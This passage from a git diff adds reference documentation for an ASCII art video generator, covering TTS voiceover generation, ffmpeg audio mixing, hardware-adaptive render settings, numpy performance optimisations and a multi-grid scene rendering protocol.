+    headers = {"xi-api-key": api_key, "Content-Type": "application/json"}
+    data = {"text": text, "model_id": model,
+            "voice_settings": {"stability": 0.5, "similarity_boost": 0.75}}
+    resp = requests.post(url, json=data, headers=headers, timeout=30)
+    resp.raise_for_status()
+    with open(output_path, "wb") as f:
+        f.write(resp.content)
+```
+
+### Voice Assignment
+
+Use multiple voices for variety. Shuffle deterministically so re-runs are consistent:
+
+```python
+import random as _rng
+
+def assign_voices(n_quotes, voice_pool, seed=42):
+    """Assign a different voice to each quote, cycling if needed."""
+    r = _rng.Random(seed)
+    shuffled = list(voice_pool)
+    r.shuffle(shuffled)
+    return [shuffled[i % len(shuffled)] for i in range(n_quotes)]
+```
+
+### Pronunciation Control
+
+TTS text should be separate from display text. Common fixes:
+- Brand names: spell phonetically ("Nous" -> "Noose", "nginx" -> "engine-x")
+- Abbreviations: expand ("API" -> "A P I", "CLI" -> "C L I")
+- Technical terms: add phonetic hints
+
+```python
+QUOTES = [("Display text here", "Author")]
+QUOTES_TTS = ["TTS text with phonetic spelling here"]
+# Keep both arrays in sync -- same indices
+```
+
+### Audio Pipeline
+
+1. Generate individual TTS clips (MP3/WAV per quote)
+2. Get duration of each clip
+3. Calculate timing: speech start/end per quote with gaps
+4. Concatenate into single TTS track with silence padding
+5. Mix with background music
+
+```python
+def build_tts_track(tts_clips, target_duration, gap_seconds=2.0):
+    """Concatenate TTS clips with gaps, pad to target duration."""
+    # Get durations
+    durations = []
+    for clip in tts_clips:
+        result = subprocess.run(
+            ["ffprobe", "-v", "error", "-show_entries", "format=duration",
+             "-of", "csv=p=0", clip],
+            capture_output=True, text=True)
+        durations.append(float(result.stdout.strip()))
+    
+    # Calculate timing
+    total_speech = sum(durations)
+    total_gaps = target_duration - total_speech
+    gap = max(0.5, total_gaps / (len(tts_clips) + 1))
+    
+    timing = []  # (start, end, quote_index)
+    t = gap  # start after initial gap
+    for i, dur in enumerate(durations):
+        timing.append((t, t + dur, i))
+        t += dur + gap
+    
+    # Concatenate with ffmpeg
+    # ... silence padding + concat filter
+    return timing
+```
+
+### Audio Mixing
+
+Mix TTS (center) with background music (wide stereo, low volume):
+
+```python
+def mix_audio(tts_path, bgm_path, output_path, bgm_volume=0.15):
+    """Mix TTS centered with BGM panned wide stereo."""
+    cmd = [
+        "ffmpeg", "-y",
+        "-i", tts_path,   # mono TTS
+        "-i", bgm_path,   # stereo BGM
+        "-filter_complex",
+        f"[0:a]aformat=sample_fmts=fltp:sample_rates=44100:channel_layouts=mono,"
+        f"pan=stereo|c0=c0|c1=c0[tts];"  # TTS center
+        f"[1:a]loudnorm=I=-16:TP=-1.5:LRA=11,"
+        f"volume={bgm_volume},"
+        f"extrastereo=2.5[bgm];"  # BGM wide stereo
+        f"[tts][bgm]amix=inputs=2:duration=longest[out]",
+        "-map", "[out]", "-c:a", "pcm_s16le", output_path
+    ]
+    subprocess.run(cmd, capture_output=True, check=True)
+```
+
+### Feature Analysis on Mixed Audio
+
+Run the standard audio analysis (FFT, beat detection) on the final mixed track so visual effects react to both TTS and music:
+
+```python
+# Analyze mixed_final.wav (not individual tracks)
+features = analyze_audio("mixed_final.wav", fps=24)
+```
+
+This means visuals will pulse with both the music beats and the speech energy -- creating natural synchronization.
diff --git a/skills/creative/ascii-video/references/optimization.md b/skills/creative/ascii-video/references/optimization.md
new file mode 100644
index 00000000..e7650c22
--- /dev/null
+++ b/skills/creative/ascii-video/references/optimization.md
@@ -0,0 +1,435 @@
+# Optimization Reference
+
+## Hardware Detection
+
+Detect the user's hardware at script startup and adapt rendering parameters automatically. Never hardcode worker counts or resolution.
+
+### CPU and Memory Detection
+
+```python
+import multiprocessing
+import platform
+import shutil
+import os
+
+def detect_hardware():
+    """Detect hardware capabilities and return render config."""
+    cpu_count = multiprocessing.cpu_count()
+    
+    # Leave 1-2 cores free for OS + ffmpeg encoding
+    if cpu_count >= 16:
+        workers = cpu_count - 2
+    elif cpu_count >= 8:
+        workers = cpu_count - 1
+    elif cpu_count >= 4:
+        workers = cpu_count - 1
+    else:
+        workers = max(1, cpu_count)
+    
+    # Memory detection (platform-specific)
+    try:
+        if platform.system() == "Darwin":
+            import subprocess
+            mem_bytes = int(subprocess.check_output(["sysctl", "-n", "hw.memsize"]).strip())
+        elif platform.system() == "Linux":
+            with open("/proc/meminfo") as f:
+                for line in f:
+                    if line.startswith("MemTotal"):
+                        mem_bytes = int(line.split()[1]) * 1024
+                        break
+        else:
+            mem_bytes = 8 * 1024**3  # assume 8GB on unknown
+    except Exception:
+        mem_bytes = 8 * 1024**3
+
+    mem_gb = mem_bytes / (1024**3)
+    
+    # Each worker uses ~50-150MB depending on grid sizes
+    # Cap workers if memory is tight
+    mem_per_worker_mb = 150
+    max_workers_by_mem = int(mem_gb * 1024 * 0.6 / mem_per_worker_mb)  # use 60% of RAM
+    workers = min(workers, max_workers_by_mem)
+    
+    # ffmpeg availability and codec support
+    has_ffmpeg = shutil.which("ffmpeg") is not None
+    
+    return {
+        "cpu_count": cpu_count,
+        "workers": workers,
+        "mem_gb": mem_gb,
+        "platform": platform.system(),
+        "arch": platform.machine(),
+        "has_ffmpeg": has_ffmpeg,
+    }
+```
+
+### Adaptive Quality Profiles
+
+Scale resolution, FPS, CRF, and grid density based on hardware:
+
+```python
+def quality_profile(hw, target_duration_s, user_preference="auto"):
+    """
+    Returns render settings adapted to hardware.
+    user_preference: "auto", "draft", "preview", "production", "max"
+    """
+    if user_preference == "draft":
+        return {"vw": 960, "vh": 540, "fps": 12, "crf": 28, "workers": min(4, hw["workers"]),
+                "grid_scale": 0.5, "shaders": "minimal", "particles_max": 200}
+    
+    if user_preference == "preview":
+        return {"vw": 1280, "vh": 720, "fps": 15, "crf": 25, "workers": hw["workers"],
+                "grid_scale": 0.75, "shaders": "standard", "particles_max": 500}
+    
+    if user_preference == "max":
+        return {"vw": 3840, "vh": 2160, "fps": 30, "crf": 15, "workers": hw["workers"],
+                "grid_scale": 2.0, "shaders": "full", "particles_max": 3000}
+    
+    # "production" or "auto"
+    # Auto-detect: estimate render time, downgrade if it would take too long
+    n_frames = int(target_duration_s * 24)
+    est_seconds_per_frame = 0.18  # ~180ms at 1080p
+    est_total_s = n_frames * est_seconds_per_frame / max(1, hw["workers"])
+    
+    if hw["mem_gb"] < 4 or hw["cpu_count"] <= 2:
+        # Low-end: 720p, 15fps
+        return {"vw": 1280, "vh": 720, "fps": 15, "crf": 23, "workers": hw["workers"],
+                "grid_scale": 0.75, "shaders": "standard", "particles_max": 500}
+    
+    if est_total_s > 3600:  # would take over an hour
+        # Downgrade to 720p to speed up
+        return {"vw": 1280, "vh": 720, "fps": 24, "crf": 20, "workers": hw["workers"],
+                "grid_scale": 0.75, "shaders": "standard", "particles_max": 800}
+    
+    # Standard production: 1080p 24fps
+    return {"vw": 1920, "vh": 1080, "fps": 24, "crf": 20, "workers": hw["workers"],
+            "grid_scale": 1.0, "shaders": "full", "particles_max": 1200}
+
+
+def apply_quality_profile(profile):
+    """Set globals from quality profile."""
+    global VW, VH, FPS, N_WORKERS
+    VW = profile["vw"]
+    VH = profile["vh"]
+    FPS = profile["fps"]
+    N_WORKERS = profile["workers"]
+    # Grid sizes scale with resolution
+    # CRF passed to ffmpeg encoder
+    # Shader set determines which post-processing is active
+```
+
+### CLI Integration
+
+```python
+parser = argparse.ArgumentParser()
+parser.add_argument("--quality", choices=["draft", "preview", "production", "max", "auto"],
+                    default="auto", help="Render quality preset")
+parser.add_argument("--workers", type=int, default=0, help="Override worker count (0=auto)")
+parser.add_argument("--resolution", type=str, default="", help="Override resolution e.g. 1280x720")
+args = parser.parse_args()
+
+hw = detect_hardware()
+if args.workers > 0:
+    hw["workers"] = args.workers
+profile = quality_profile(hw, target_duration, args.quality)
+if args.resolution:
+    w, h = args.resolution.split("x")
+    profile["vw"], profile["vh"] = int(w), int(h)
+apply_quality_profile(profile)
+
+log(f"Hardware: {hw['cpu_count']} cores, {hw['mem_gb']:.1f}GB RAM, {hw['platform']}")
+log(f"Render:   {profile['vw']}x{profile['vh']} @{profile['fps']}fps, "
+    f"CRF {profile['crf']}, {profile['workers']} workers")
+```
+
+## Performance Budget
+
+Target: 100-200ms per frame (5-10 fps single-threaded, 40-80 fps across 8 workers).
+
+| Component | Time | Notes |
+|-----------|------|-------|
+| Feature extraction | 1-5ms | Pre-computed for all frames before render |
+| Effect function | 2-15ms | Vectorized numpy, avoid Python loops |
+| Character render | 80-150ms | **Bottleneck** -- per-cell Python loop |
+| Shader pipeline | 5-25ms | Depends on active shaders |
+| ffmpeg encode | ~5ms | Amortized by pipe buffering |
+
+## Bitmap Pre-Rasterization
+
+Rasterize every character at init, not per-frame:
+
+```python
+# At init time -- done once
+for c in all_characters:
+    img = Image.new("L", (cell_w, cell_h), 0)
+    ImageDraw.Draw(img).text((0, 0), c, fill=255, font=font)
+    bitmaps[c] = np.array(img, dtype=np.float32) / 255.0  # float32 for fast multiply
+
+# At render time -- fast lookup
+bitmap = bitmaps[char]
+canvas[y:y+ch, x:x+cw] = np.maximum(canvas[y:y+ch, x:x+cw],
+                                      (bitmap[:,:,None] * color).astype(np.uint8))
+```
+
+Collect all characters from all palettes + overlay text into the init set. Lazy-init for any missed characters.
+
+## Coordinate Array Caching
+
+Pre-compute all grid-relative coordinate arrays at init, not per-frame:
+
+```python
+# These are O(rows*cols) and used in every effect
+self.rr = np.arange(rows)[:, None]    # row indices
+self.cc = np.arange(cols)[None, :]    # col indices
+self.dist = np.sqrt(dx**2 + dy**2)   # distance from center
+self.angle = np.arctan2(dy, dx)       # angle from center
+self.dist_n = ...                      # normalized distance
+```
+
+## Vectorized Effect Patterns
+
+### Avoid Per-Cell Python Loops in Effects
+
+The render loop (compositing bitmaps) is unavoidably per-cell. But effect functions must be fully vectorized numpy -- never iterate over rows/cols in Python.
+
+Bad (O(rows*cols) Python loop):
+```python
+for r in range(rows):
+    for c in range(cols):
+        val[r, c] = math.sin(c * 0.1 + t) * math.cos(r * 0.1 - t)
+```
+
+Good (vectorized):
+```python
+val = np.sin(g.cc * 0.1 + t) * np.cos(g.rr * 0.1 - t)
+```
+
+### Vectorized Matrix Rain
+
+The naive per-column per-trail-pixel loop is the second biggest bottleneck after the render loop. Use numpy fancy indexing:
+
+```python
+# Instead of nested Python loops over columns and trail pixels:
+# Build row index arrays for all active trail pixels at once
+all_rows = []
+all_cols = []
+all_fades = []
+for c in range(cols):
+    head = int(state["ry"][c])
+    trail_len = state["rln"][c]
+    for i in range(trail_len):
+        row = head - i
+        if 0 <= row < rows:
+            all_rows.append(row)
+            all_cols.append(c)
+            all_fades.append(1.0 - i / trail_len)
+
+# Vectorized assignment
+ar = np.array(all_rows)
+ac = np.array(all_cols)
+af = np.array(all_fades, dtype=np.float32)
+# Assign chars and colors in bulk using fancy indexing
+ch[ar, ac] = ...  # vectorized char assignment
+co[ar, ac, 1] = (af * bri * 255).astype(np.uint8)  # green channel
+```
+
+### Vectorized Fire Columns
+
+Same pattern -- accumulate index arrays, assign in bulk:
+
+```python
+fire_val = np.zeros((rows, cols), dtype=np.float32)
+for fi in range(n_cols):
+    fx_c = int((fi * cols / n_cols + np.sin(t * 2 + fi * 0.7) * 3) % cols)
+    height = int(energy * rows * 0.7)
+    dy = np.arange(min(height, rows))
+    fr = rows - 1 - dy
+    frac = dy / max(height, 1)
+    # Width spread: base columns wider at bottom
+    for dx in range(-1, 2):  # 3-wide columns
+        c = fx_c + dx
+        if 0 <= c < cols:
+            fire_val[fr, c] = np.maximum(fire_val[fr, c],
+                                          (1 - frac * 0.6) * (0.5 + rms * 0.5))
+# Now map fire_val to chars and colors in one vectorized pass
+```
+
+## Bloom Optimization
+
+**Do NOT use `scipy.ndimage.uniform_filter`** -- measured at 424ms/frame.
+
+Use 4x downsample + manual box blur instead -- 84ms/frame (5x faster):
+
+```python
+sm = canvas[::4, ::4].astype(np.float32)  # 4x downsample
+br = np.where(sm > threshold, sm, 0)
+for _ in range(3):                          # 3-pass manual box blur
+    p = np.pad(br, ((1,1),(1,1),(0,0)), mode='edge')
+    br = (p[:-2,:-2] + p[:-2,1:-1] + p[:-2,2:] +
+          p[1:-1,:-2] + p[1:-1,1:-1] + p[1:-1,2:] +
+          p[2:,:-2] + p[2:,1:-1] + p[2:,2:]) / 9.0
+bl = np.repeat(np.repeat(br, 4, axis=0), 4, axis=1)[:H, :W]
+```
+
+## Vignette Caching
+
+Distance field is resolution- and strength-dependent, never changes per frame:
+
+```python
+_vig_cache = {}
+def sh_vignette(canvas, strength):
+    key = (canvas.shape[0], canvas.shape[1], round(strength, 2))
+    if key not in _vig_cache:
+        Y = np.linspace(-1, 1, H)[:, None]
+        X = np.linspace(-1, 1, W)[None, :]
+        _vig_cache[key] = np.clip(1.0 - np.sqrt(X**2+Y**2) * strength, 0.15, 1).astype(np.float32)
+    return np.clip(canvas * _vig_cache[key][:,:,None], 0, 255).astype(np.uint8)
+```
+
+Same pattern for CRT barrel distortion (cache remap coordinates).
+
+## Film Grain Optimization
+
+Generate noise at half resolution, tile up:
+
+```python
+noise = np.random.randint(-amt, amt+1, (H//2, W//2, 1), dtype=np.int16)
+noise = np.repeat(np.repeat(noise, 2, axis=0), 2, axis=1)[:H, :W]
+```
+
+2x blocky grain looks like film grain and costs 1/4 the random generation.
+
+## Parallel Rendering
+
+### Worker Architecture
+
+```python
+hw = detect_hardware()
+N_WORKERS = hw["workers"]
+
+# Batch splitting (for non-clip architectures)
+batch_size = (n_frames + N_WORKERS - 1) // N_WORKERS
+batches = [(i, i*batch_size, min((i+1)*batch_size, n_frames), features, seg_path) ...]
+
+with multiprocessing.Pool(N_WORKERS) as pool:
+    segments = pool.starmap(render_batch, batches)
+```
+
+### Per-Clip Parallelism (Preferred for Segmented Videos)
+
+```python
+from concurrent.futures import ProcessPoolExecutor, as_completed
+
+with ProcessPoolExecutor(max_workers=N_WORKERS) as pool:
+    futures = {pool.submit(render_clip, seg, features, path): seg["id"]
+               for seg, path in clip_args}
+    for fut in as_completed(futures):
+        clip_id = futures[fut]
+        try:
+            fut.result()
+            log(f"  {clip_id} done")
+        except Exception as e:
+            log(f"  {clip_id} FAILED: {e}")
+```
+
+### Worker Isolation
+
+Each worker:
+- Creates its own `Renderer` instance (with full grid + bitmap init)
+- Opens its own ffmpeg subprocess
+- Has independent random seed (`random.seed(batch_id * 10000)`)
+- Writes to its own segment file and stderr log
+
+### ffmpeg Pipe Safety
+
+**CRITICAL**: Never `stderr=subprocess.PIPE` with long-running ffmpeg. The stderr buffer fills at ~64KB and deadlocks:
+
+```python
+# WRONG -- will deadlock
+pipe = subprocess.Popen(cmd, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
+
+# RIGHT -- stderr to file
+stderr_fh = open(err_path, "w")
+pipe = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.DEVNULL, stderr=stderr_fh)
+# ... write all frames ...
+pipe.stdin.close()
+pipe.wait()
+stderr_fh.close()
+```
+
+### Concatenation
+
+```python
+with open(concat_file, "w") as cf:
+    for seg in segments:
+        cf.write(f"file '{seg}'\n")
+
+cmd = ["ffmpeg", "-y", "-f", "concat", "-safe", "0", "-i", concat_file]
+if audio_path:
+    cmd += ["-i", audio_path, "-c:v", "copy", "-c:a", "aac", "-b:a", "192k", "-shortest"]
+else:
+    cmd += ["-c:v", "copy"]
+cmd.append(output_path)
+subprocess.run(cmd, capture_output=True, check=True)
+```
+
+## Particle System Performance
+
+Cap particle counts based on quality profile:
+
+| System | Low | Standard | High |
+|--------|-----|----------|------|
+| Explosion | 300 | 1000 | 2500 |
+| Embers | 500 | 1500 | 3000 |
+| Starfield | 300 | 800 | 1500 |
+| Dissolve | 200 | 600 | 1200 |
+
+Cull by truncating lists:
+```python
+MAX_PARTICLES = profile.get("particles_max", 1200)
+if len(S["px"]) > MAX_PARTICLES:
+    for k in ("px", "py", "vx", "vy", "life", "char"):
+        S[k] = S[k][-MAX_PARTICLES:]  # keep newest
+```
+
+## Memory Management
+
+- Feature arrays: pre-computed for all frames, shared across workers via fork semantics (COW)
+- Canvas: allocated once per worker, reused (`np.zeros(...)`)
+- Character arrays: allocated per frame (cheap -- rows*cols U1 strings)
+- Bitmap cache: ~500KB per grid size, initialized once per worker
+
+Total memory per worker: ~50-150MB. Total: ~400-800MB for 8 workers.
+
+For low-memory systems (< 4GB), reduce worker count and use smaller grids.
+
+## Brightness Verification
+
+After render, spot-check brightness at sample timestamps:
+
+```python
+for t in [2, 30, 60, 120, 180]:
+    cmd = ["ffmpeg", "-ss", str(t), "-i", output_path,
+           "-frames:v", "1", "-f", "rawvideo", "-pix_fmt", "rgb24", "-"]
+    r = subprocess.run(cmd, capture_output=True)
+    arr = np.frombuffer(r.stdout, dtype=np.uint8)
+    print(f"t={t}s  mean={arr.mean():.1f}  max={arr.max()}")
+```
+
+Target: mean > 5 for quiet sections, mean > 15 for active sections. If consistently below, increase brightness floor in effects and/or global boost multiplier.
+
+## Render Time Estimates
+
+Scale with hardware. Baseline: 1080p, 24fps, ~180ms/frame/worker.
+
+| Duration | Frames | 4 workers | 8 workers | 16 workers |
+|----------|--------|-----------|-----------|------------|
+| 30s | 720 | ~3 min | ~2 min | ~1 min |
+| 2 min | 2,880 | ~13 min | ~7 min | ~4 min |
+| 3.5 min | 5,040 | ~23 min | ~12 min | ~6 min |
+| 5 min | 7,200 | ~33 min | ~17 min | ~9 min |
+| 10 min | 14,400 | ~65 min | ~33 min | ~17 min |
+
+At 720p: multiply times by ~0.5. At 4K: multiply by ~4.
+
+Heavier effects (many particles, dense grids, extra shader passes) add ~20-50%.
diff --git a/skills/creative/ascii-video/references/scenes.md b/skills/creative/ascii-video/references/scenes.md
new file mode 100644
index 00000000..66f48557
--- /dev/null
+++ b/skills/creative/ascii-video/references/scenes.md
@@ -0,0 +1,382 @@
+# Scene System Reference
+
+Scenes are the top-level creative unit. Each scene is a time-bounded segment with its own effect function, shader chain, feedback configuration, and tone-mapping gamma.
+
+## Scene Protocol (v2)
+
+### Function Signature
+
+```python
+def fx_scene_name(r, f, t, S) -> canvas:
+    """
+    Args:
+        r: Renderer instance — access multiple grids via r.get_grid("sm")
+        f: dict of audio/video features, all values normalized to [0, 1]
+        t: time in seconds (global, not local to scene)
+        S: dict for persistent state (particles, rain columns, etc.)
+
+    Returns:
+        canvas: numpy uint8 array, shape (VH, VW, 3) — full pixel frame
+    """
+```
+
+This replaces the v1 protocol where scenes returned `(chars, colors)` tuples. The v2 protocol gives scenes full control over multi-grid rendering and pixel-level composition internally.
+
+### The Renderer Class
+
+```python
+class Renderer:
+    def __init__(self):
+        self.grids = {}   # lazy-initialized grid cache
+        self.g = None      # "active" grid (for backward compat)
+        self.S = {}        # persistent state dict
+
+    def get_grid(self, key):
+        """Get or create a GridLayer by size key."""
+        if key not in self.grids:
+            sizes = {"xs": 8, "sm": 10, "md": 16, "lg": 20, "xl": 24, "xxl": 40}
+            self.grids[key] = GridLayer(FONT_PATH, sizes[key])
+        return self.grids[key]
+
+    def set_grid(self, key):
+        """Set active grid (legacy). Prefer get_grid() for multi-grid scenes."""
+        self.g = self.get_grid(key)
+        return self.g
+```
+
+**Key difference from v1**: scenes call `r.get_grid("sm")`, `r.get_grid("lg")`, etc. to access multiple grids. Each grid is lazy-initialized and cached. The `set_grid()` method still works for single-grid scenes.
+
+### Minimal Scene (Single Grid)
+
+```python
+def fx_simple_rings(r, f, t, S):
+    """Single-grid scene: rings with distance-mapped hue."""
+    canvas = _render_vf(r, "md",
+        lambda g, f, t, S: vf_rings(g, f, t, S, n_base=8, spacing_base=3),
+        hf_distance(0.3, 0.02), PAL_STARS, f, t, S, sat=0.85)
+    return canvas
+```
+
+### Standard Scene (Two Grids + Blend)
+
+```python
+def fx_tunnel_ripple(r, f, t, S):
+    """Two-grid scene: tunnel depth exclusion-blended with ripple."""
+    canvas_a = _render_vf(r, "md",
+        lambda g, f, t, S: vf_tunnel(g, f, t, S, speed=5.0, complexity=10) * 1.3,
+        hf_distance(0.55, 0.02), PAL_GREEK, f, t, S, sat=0.7)
+
+    canvas_b = _render_vf(r, "sm",
+        lambda g, f, t, S: vf_ripple(g, f, t, S,
+            sources=[(0.3,0.3), (0.7,0.7), (0.5,0.2)], freq=0.5, damping=0.012) * 1.4,
+        hf_angle(0.1), PAL_STARS, f, t, S, sat=0.8)
+
+    return blend_canvas(canvas_a, canvas_b, "exclusion", 0.8)
+```
+
+### Complex Scene (Three Grids + Conditional + Custom Rendering)
+
+```python
+def fx_rings_explosion(r, f, t, S):
+    """Three-grid scene with particles and conditional kaleidoscope."""
+    # Layer 1: rings
+    canvas_a = _render_vf(r, "sm",
+        lambda g, f, t, S: vf_rings(g, f, t, S, n_base=10, spacing_base=2) * 1.4,
+        lambda g, f, t, S: (g.angle / (2*np.pi) + t * 0.15) % 1.0,
+        PAL_STARS, f, t, S, sat=0.9)
+
+    # Layer 2: vortex on different grid
+    canvas_b = _render_vf(r, "md",
+        lambda g, f, t, S: vf_vortex(g, f, t, S, twist=6.0) * 1.2,
+        hf_time_cycle(0.15), PAL_BLOCKS, f, t, S, sat=0.8)
+
+    result = blend_canvas(canvas_b, canvas_a, "screen", 0.7)
+
+    # Layer 3: particles (custom rendering, not _render_vf)
+    g = r.get_grid("sm")
+    if "px" not in S:
+        S["px"], S["py"], S["vx"], S["vy"], S["life"], S["pch"] = (
+            [], [], [], [], [], [])
+    if f.get("beat", 0) > 0.5:
+        chars = list("\u2605\u2736\u2733\u2738\u2726\u2728*+")
+        for _ in range(int(80 + f.get("rms", 0.3) * 120)):
+            ang = random.uniform(0, 2 * math.pi)
+            sp = random.uniform(1, 10) * (0.5 + f.get("sub_r", 0.3) * 2)
+            S["px"].append(float(g.cols // 2))
+            S["py"].append(float(g.rows // 2))
+            S["vx"].append(math.cos(ang) * sp * 2.5)
+            S["vy"].append(math.sin(ang) * sp)
+            S["life"].append(1.0)
+            S["pch"].append(random.choice(chars))
+
+    # Update + draw particles
+    ch_p = np.full((g.rows, g.cols), " ", dtype="U1")
+    co_p = np.zeros((g.rows, g.cols, 3), dtype=np.uint8)
+    i = 0
+    while i < len(S["px"]):
+        S["px"][i] += S["vx"][i]; S["py"][i] += S["vy"][i]
+        S["vy"][i] += 0.03; S["life"][i] -= 0.02
+        if S["life"][i] <= 0:
+            for k in ("px","py","vx","vy","life","pch"): S[k].pop(i)
+        else:
+            pr, pc = int(S["py"][i]), int(S["px"][i])
+            if 0 <= pr < g.rows and 0 <= pc < g.cols:
+                ch_p[pr, pc] = S["pch"][i]
+                co_p[pr, pc] = hsv2rgb_scalar(
+                    0.08 + (1-S["life"][i])*0.15, 0.95, S["life"][i])
+            i += 1
+
+    canvas_p = g.render(ch_p, co_p)
+    result = blend_canvas(result, canvas_p, "add", 0.8)
+
+    # Conditional kaleidoscope on strong beats
+    if f.get("bdecay", 0) > 0.4:
+        result = sh_kaleidoscope(result.copy(), folds=6)
+
+    return result
+```
+
+### Scene with Custom Character Rendering (Matrix Rain)
+
+When you need per-cell control beyond what `_render_vf()` provides:
+
+```python
+def fx_matrix_layered(r, f, t, S):
+    """Matrix rain blended with tunnel — two grids, screen blend."""
+    # Layer 1: Matrix rain (custom per-column rendering)
+    g = r.get_grid("md")
+    rows, cols = g.rows, g.cols
+    pal = PAL_KATA
+
+    if "ry" not in S or len(S["ry"]) != cols:
+        S["ry"] = np.random.uniform(-rows, rows, cols).astype(np.float32)
+        S["rsp"] = np.random.uniform(0.3, 2.0, cols).astype(np.float32)
+        S["rln"] = np.random.randint(8, 35, cols)
+        S["rch"] = np.random.randint(1, len(pal), (rows, cols))
+
+    speed = 0.6 + f.get("bass", 0.3) * 3
+    if f.get("beat", 0) > 0.5: speed *= 2.5
+    S["ry"] += S["rsp"] * speed
+
+    ch = np.full((rows, cols), " ", dtype="U1")
+    co = np.zeros((rows, cols, 3), dtype=np.uint8)
+    heads = S["ry"].astype(int)
+    for c in range(cols):
+        head = heads[c]
+        for i in range(S["rln"][c]):
+            row = head - i
+            if 0 <= row < rows:
+                fade = 1.0 - i / S["rln"][c]
+                ch[row, c] = pal[S["rch"][row, c] % len(pal)]
+                if i == 0:
+                    v = int(min(255, fade * 300))
+                    co[row, c] = (int(v*0.9), v, int(v*0.9))
+                else:
+                    v = int(fade * 240)
+                    co[row, c] = (int(v*0.1), v, int(v*0.4))
+    canvas_a = g.render(ch, co)
+
+    # Layer 2: Tunnel on sm grid for depth texture
+    canvas_b = _render_vf(r, "sm",
+        lambda g, f, t, S: vf_tunnel(g, f, t, S, speed=5.0, complexity=10),
+        hf_distance(0.3, 0.02), PAL_BLOCKS, f, t, S, sat=0.6)
+
+    return blend_canvas(canvas_a, canvas_b, "screen", 0.5)
+```
+
+---
+
+## Scene Table
+
+The scene table defines the timeline: which scene plays when, with what configuration.
+
+### Structure
+
+```python
+SCENES = [
+    {
+        "start": 0.0,           # start time in seconds
+        "end": 3.96,            # end time in seconds
+        "name": "starfield",    # identifier (used for clip filenames)
+        "grid": "sm",           # default grid (for render_clip setup)
+        "fx": fx_starfield,     # scene function reference (must be module-level)
+        "gamma": 0.75,          # tonemap gamma override (default 0.75)
+        "shaders": [            # shader chain (applied after tonemap + feedback)
+            ("bloom", {"thr": 120}),
+            ("vignette", {"s": 0.2}),
+            ("grain", {"amt": 8}),
+        ],
+        "feedback": None,       # feedback buffer config (None = disabled)
+        # "feedback": {"decay": 0.8, "blend": "screen", "opacity": 0.3,
+        #              "transform": "zoom", "transform_amt": 0.02, "hue_shift": 0.02},
+    },
+    {
+        "start": 3.96,
+        "end": 6.58,
+        "name": "matrix_layered",
+        "grid": "md",
+        "fx": fx_matrix_layered,
+        "shaders": [
+            ("crt", {"strength": 0.05}),
+            ("scanlines", {"intensity": 0.12}),
+            ("color_grade", {"tint": (0.7, 1.2, 0.7)}),
+            ("bloom", {"thr": 100}),
+        ],
+        "feedback": {"decay": 0.5, "blend": "add", "opacity": 0.2},
+    },
+    # ... more scenes ...
+]
+```
+
+### Beat-Synced Scene Cutting
+
+Derive cut points from audio analysis:
+
+```python
+# Get beat timestamps
+beats = [fi / FPS for fi in range(N_FRAMES) if features["beat"][fi] > 0.5]
+
+# Group beats into phrase boundaries (every 4-8 beats)
+cuts = [0.0]
+for i in range(0, len(beats), 4):  # cut every 4 beats
+    cuts.append(beats[i])
+cuts.append(DURATION)
+
+# Or use the music's structure: silence gaps, energy changes
+energy = features["rms"]
+# Find timestamps where energy drops significantly -> natural break points
+```
+
+### `render_clip()` — The Render Loop
+
+This function renders one scene to a clip file:
+
+```python
+def render_clip(seg, features, clip_path):
+    r = Renderer()
+    r.set_grid(seg["grid"])
+    S = r.S
+    random.seed(hash(seg["id"]) + 42)  # deterministic per scene
+
+    # Build shader chain from config
+    chain = ShaderChain()
+    for shader_name, kwargs in seg.get("shaders", []):
+        chain.add(shader_name, **kwargs)
+
+    # Setup feedback buffer
+    fb = None
+    fb_cfg = seg.get("feedback", None)
+    if fb_cfg:
+        fb = FeedbackBuffer()
+
+    fx_fn = seg["fx"]
+
+    # Open ffmpeg pipe
+    cmd = ["ffmpeg", "-y", "-f", "rawvideo", "-pix_fmt", "rgb24",
+           "-s", f"{VW}x{VH}", "-r", str(FPS), "-i", "pipe:0",
+           "-c:v", "libx264", "-preset", "fast", "-crf", "20",
+           "-pix_fmt", "yuv420p", clip_path]
+    stderr_fh = open(clip_path.replace(".mp4", ".log"), "w")
+    pipe = subprocess.Popen(cmd, stdin=subprocess.PIPE,
+                            stdout=subprocess.DEVNULL, stderr=stderr_fh)
+
+    for fi in range(seg["frame_start"], seg["frame_end"]):
+        t = fi / FPS
+        feat = {k: float(features[k][fi]) for k in features}
+
+        # 1. Scene renders canvas
+        canvas = fx_fn(r, feat, t, S)
+
+        # 2. Tonemap normalizes brightness
+        canvas = tonemap(canvas, gamma=seg.get("gamma", 0.75))
+
+        # 3. Feedback adds temporal recursion
+        if fb and fb_cfg:
+            canvas = fb.apply(canvas, **{k: fb_cfg[k] for k in fb_cfg})
+
+        # 4. Shader chain adds post-processing
+        canvas = chain.apply(canvas, f=feat, t=t)
+
+        pipe.stdin.write(canvas.tobytes())
+
+    pipe.stdin.close(); pipe.wait(); stderr_fh.close()
+```
+
+### Building Segments from Scene Table
+
+```python
+segments = []
+for i, scene in enumerate(SCENES):
+    segments.append({
+        "id": f"s{i:02d}_{scene['name']}",
+        "name": scene["name"],
+        "grid": scene["grid"],
+        "fx": scene["fx"],
+        "shaders": scene.get("shaders", []),
+        "feedback": scene.get("feedback", None),
+        "gamma": scene.get("gamma", 0.75),
+        "frame_start": int(scene["start"] * FPS),
+        "frame_end": int(scene["end"] * FPS),
+    })
+```
+
+### Parallel Rendering
+
+Scenes are independent units dispatched to a process pool:
+
+```python
+from concurrent.futures import ProcessPoolExecutor, as_completed
+
+with ProcessPoolExecutor(max_workers=N_WORKERS) as pool:
+    futures = {
+        pool.submit(render_clip, seg, features, clip_path): seg["id"]
+        for seg, clip_path in zip(segments, clip_paths)
+    }
+    for fut in as_completed(futures):
+        try:
+            fut.result()
+        except Exception as e:
+            log(f"ERROR {futures[fut]}: {e}")
+```
+
+**Pickling constraint**: `ProcessPoolExecutor` serializes arguments via pickle. Module-level functions can be pickled; lambdas and closures cannot. All `fx_*` scene functions MUST be defined at module level, not as closures or class methods.
+
+### Test-Frame Mode
+
+Render a single frame at a specific timestamp to verify visuals without a full render:
+
+```python
+if args.test_frame >= 0:
+    fi = min(int(args.test_frame * FPS), N_FRAMES - 1)
+    t = fi / FPS
+    feat = {k: float(features[k][fi]) for k in features}
+    scene = next(sc for sc in reversed(SCENES) if t >= sc["start"])
+    r = Renderer()
+    r.set_grid(scene["grid"])
